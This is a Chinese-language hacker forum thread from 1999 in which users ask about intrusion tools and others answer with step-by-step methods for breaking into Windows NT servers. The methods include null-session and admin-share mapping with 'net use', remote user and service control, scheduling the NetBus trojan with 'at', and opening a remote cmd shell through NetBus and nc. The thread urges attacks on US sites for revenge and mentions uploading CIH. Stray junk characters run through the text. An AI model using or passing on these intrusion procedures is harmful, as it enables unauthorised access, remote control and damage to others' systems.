《版主页黑客工具和文章的几个问题》中提到:
- i4 H) a; v3 {: l- t: M6 m/ X请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。' ^5 M( _6 o- [" {' q
> 我的机子MMX166,WIN98,2。5G,32M内存。
$ |, s# |& m. K% i: ~/ h0 Z; o( t8 @+ a
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
$ T* e/ { C4 L+ w1 ?0 N0 v9 {- Q你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
( ~+ P6 F+ `! ~! `2 E( J! U( i' ]# r$ u其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
' [. Y4 a- N, l5 n: F' p5 ~net use \\111.111.111.111\ipc$ "" /user:""2 L3 {* B" V6 k# U; g, l
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录: C6 ~/ G" G3 I x4 U' E
net view \\111.111.111.111
3 K* p, d: V& r当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
; p( m7 q; z' o. @. xnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"1 [3 _& V6 A9 H: q8 i
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
$ |' s6 ]; H9 F8 m( P+ Z" {3 i( b1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
2 f) ^8 w- X( \8 l ^* r) i* Mnet use x: \\111.111.111.111\c$! B/ P- |- Y0 L1 S6 ~! D8 c1 O
net use y: \\111.111.111.111\d$
. Z& y2 I( _- k6 |; C1 X这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...2 X* o( Y2 P2 a4 P# i7 f/ c
2、管理目标NT的用户:
+ N9 _7 M* o. {/ r: x: G# J/ V i从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”# E) N+ u8 |/ x* F# N8 N' t$ Q0 x
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样" S% }: A* b" i9 L
3、管理目标NT的服务. T) Q- J6 T" c$ K( F% p
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
8 O6 w5 _& V. O$ W/ v( @$ i这样你可以管理目标NT上的服务,共享目录* S. Z- N& e7 c5 e: a1 n0 K/ q
4、IIS管理
! s/ `5 Q. d% i3 j, L0 d选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
" L9 `/ l; v9 C目标NT的FTP、WWW服务你就可以重新配置
! J/ i1 `" d3 _! G* Z5、事件管理
* O# B# ?2 O y4 n e n“事件查看器”->连接到服务器->111.111.111.111
& v5 c- `" w& c9 P G% @2 r, T# J: j) f. A& ]
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。6 R8 Q; [0 o# a1 l
6 v! @8 T: X6 Q& ]当然,98,95也能做一些事情,但很麻烦,比如:) {8 q3 r; G4 W; {3 C; y! t5 u8 H
net use \\111.111.111.111\ipc$7 g; W" A6 ]- D. A" r4 L
net use z: \\111.111.111.111\d$
( ~$ u# @+ ?3 M2 F- J/ d但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
6 Y' R* N% t; G9 L9 d
( e! d V2 H, A3 T6 J8 H我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以! M: F+ F6 b# p& G
这样,你还可以了解目标机器上能有什么东东供你去用!9 I3 D: Y& V5 O' f9 n6 l/ ]
8 q) e7 w2 ^( b. f5 p
0 K, f( ]- l% A3 y" b7 G/ Z! K--------------------------------------------------------------------------------
5 g) y1 u% o- z6 @3 ]. i7 r- C
; p# d `/ e5 `3 [" {8 c& a>quack于1999-06-12,23:37:44/ P: ~( t3 J1 @5 S- ?
在大作《几个有关黑的问题》中提到:
- C$ B$ ~' w- m. n首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。0 u! s& V7 O' R
, I2 ]# U( a- X4 ^! Z* o5 |4 @. l
killusa于1999-06-13,03:25:15# i8 B6 P* i3 r: ]5 J
在大作《Re: 几个有关黑的问题》中提到:
0 t3 \1 G, z6 k& X+ x) k& m& V! l6 T6 O* h9 Z
letmein.exe 暂时没有mypwd参数,十分抱歉4 u/ E" a, L1 [& R
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。6 q* P+ I L8 u- f
& B! |8 w3 ~9 Z7 F* v+ |
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的( M6 K9 \' B* d* @
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
, |9 l# J1 I# Z& G# D3 F9 A6 M
6 i& c) P9 H( @3 {9 B/ y1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:5 |# m7 s) r1 ^9 ]
# t; A2 Q: k; _9 f
C:\>net start schedule2 U R2 M% M$ @, U, j/ a
Schedule 正在启动服务.....' `; }# j( I9 G3 F
Schedulw 服务启动成功。, i! @1 q5 U6 P* _/ T, [0 i* O* `
C:\>at /?
# z% i* R& G- o8 j4 g/ NAT 命令排定在特定的日期和时间运行某些命令和程序。' Z, }! Z) I$ g' B, O
运行 AT 命令之前必须先启动 Schedule 服务。
* X" q/ i& Z0 n0 K8 q! j
, C& P! m6 d5 W' Y! z% fAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]6 `) ~5 h+ Y O; Y0 ~
AT [\\computername] time [/INTERACTIVE]# [; C: L. I3 R ]* z
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"1 p; ~# i) n4 ~' M6 K
( W) A2 w# c5 A8 T$ Q+ \& d7 ]. M
\\computername 指定远程计算机。 如果省略这个参数" ?! I6 K$ [. u( }
命令会被排定在本机上运行。1 C2 N- k: @3 [& _" m& X
id 指定给排定进度命令的识别号。 h6 V6 F* I8 o4 c' \* G
' U* Z) \0 Y' w/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
9 {% U+ o) I. C2 d* J/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
, E1 {3 O: r1 e) A P4 ]time 指定命令运行的时间。
1 W1 @* W+ K0 n8 E5 _1 T! D! ~/interactive 允许作业在运行时,与用户通过桌面交互。; X) u# i; @% w+ m4 v
+ N$ j; `5 r# q) y) a/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
2 e& w. B, j& ?如果省略日期,则默认为在每月的本日运行。, d& E" d8 ~1 j8 d" v3 e; w2 I
0 P) t u# |+ v! K
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
6 _; g) `5 k& z+ @- |3 P
1 b, z) U* V. x# i"command" 准备运行的 Windows NT 命令或批处理文件。
' d3 k! j3 E; c5 x
* Q1 D3 t' `0 J& ZC:\>
5 z- d. @3 c# L5 S3 g
& ^9 m& ^2 [9 H3 V知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
( E) t/ t5 K# i6 O9 a- f/ p1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"' C8 f. i* a* S
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start% x5 ?$ o# D" w( K
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
4 g# R$ O# z: o) \, P. b2 B$ _at \\x.x.x.x 00:00 ntsrv.exe /port:64321
# }7 Z' p0 ?* a/ P7 ]6 F其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:5 Q9 s8 N# w/ {! T
Microsoft(R) Windows NT(TM)
/ C; `" j' P4 U' x' e# q, `1 |(C) Copyright 1985-1996 Microsoft Corp.. j( r1 P p# z0 e4 g
C:\>8 X/ O9 W5 k7 F0 A0 T# \" }
/ ]0 C! ^ y. |2、利用web启动ntsrv.exe或其他程序在目的服务器# _% F& f. @: ~6 w1 H
4 ?! n g) l, z& h! K _- `* q; e# T
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
" M6 x0 p9 y o7 |& m" x/ whttp://x.x.x.x/scripts/ntsrv.exe /port:64321
. r+ L' R4 X' v) o6 k3 Y或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:643214 A" \* C% ]3 v5 {) I; n
该程序就启动了
+ z( K" K& F2 b# [* O; y8 x F- c6 f5 {; n7 J8 E9 Q( ]6 {4 l
我只提这几中方法!4 q1 O( t$ |. d8 x- z8 d+ P
要成功,必须打好基础工,对操作系统充分了解!1 q, o' A3 F& j$ P, p7 o
0 f( o1 [, {6 T. ? |